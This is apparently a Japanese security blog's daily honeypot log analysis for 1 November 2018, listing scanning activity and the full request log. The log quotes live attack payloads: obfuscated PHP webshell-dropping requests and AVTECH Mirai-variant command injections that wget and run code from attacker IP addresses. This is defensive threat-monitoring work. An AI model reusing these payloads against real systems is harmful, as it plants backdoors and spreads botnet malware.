S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/11/01)

ハニーポットのログ分析(2018/11/01)

honeypot

WOWhoneypotの2018/11/01(木) (運用148日目)の簡易分析です。
本日の総アクセス件数は 65件です。

主なアクセスは以下です。

phpのWebShell設置の調査:9件
phpMyAdminの調査:8件
・AVTECHの脆弱性を突くMirai亜種の攻撃(User-Agent: Sefa、Dark):2件
・(新規)Android BankbotのC2の管理パネルを調査する行為と思われます

GET /private/checkPanel.php HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5

 

本日のドメイン名でのアクセスは以下です。

5 GET /
2 GET /robots.txt
1 GET /wp-login.php

本日のハンティングログは以下です。

1 2018-11-01 wget hxxp://209.141.33.119/avtechsh
1 2018-11-01 wget hxxp://104.244.76.210/avtech

 

以下が全アクセスログです。

  

件数 日付 種別 リクエス
38 2018-11-01 アクセス GET /
2 2018-11-01 クローリング GET /robots.txt
1 2018-11-01 phpのWebShell設置の調査 POST /xw1.php
1 2018-11-01 phpのWebShell設置の調査 POST /images.php
1 2018-11-01 phpのWebShell設置の調査 POST /cmx.php
1 2018-11-01 phpのWebShell設置の調査 POST /9678.php
1 2018-11-01 調査 OPTIONS /
1 2018-11-01 WordPressの調査 GET /wp-login.php
1 2018-11-01 WebDAVの調査 GET /webdav/
1 2018-11-01 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
1 2018-11-01 Android Bankbotの管理パネルの調査 GET /private/checkPanel.php
1 2018-11-01 phpMyAdminの調査 GET /PMA/index.php
1 2018-11-01 phpMyAdminの調査 GET /phpmyadmin2/index.php
1 2018-11-01 phpMyAdminの調査 GET /phpMyAdm1n/index.php
1 2018-11-01 phpMyAdminの調査 GET /phpmyadm1n/index.php
1 2018-11-01 phpMyAdminの調査 GET /phpAdmin/index.php
1 2018-11-01 phpのWebShell設置の調査 GET /lol.php
1 2018-11-01 phpのWebShell設置の調査 GET /license.php
1 2018-11-01 phpのWebShell設置の調査 GET /java.php
1 2018-11-01 phpのWebShell設置の調査 GET /desktop.ini.php
1 2018-11-01 phpMyAdminの調査 GET /dbadmin/index.php
1 2018-11-01 Apache Magica攻撃 GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ%3D%3D%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-11-01 Apache Magica攻撃 GET /cmx.php?cmd=echo+%22%3C%3Fphp+%5C%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%5C%24test%3D%5C%24func%28%27%5C%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%5C%24x%29%29%3B%27%29%3B%5C%24test%28%27QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ%3D%3D%27%29%3B+%3F%3E%22+%3Eimages.php+%26+echo+Hello%2C+Peppa%21
1 2018-11-01 phpのWebShell設置の調査 GET /cmx.php
1 2018-11-01 AVTECHの脆弱性を突くMirai亜種の攻撃 GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
1 2018-11-01 AVTECHの脆弱性を突くMirai亜種の攻撃 GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin
1 2018-11-01 phpMyAdminの調査 GET /admin/PMA/index.php

 

以上です。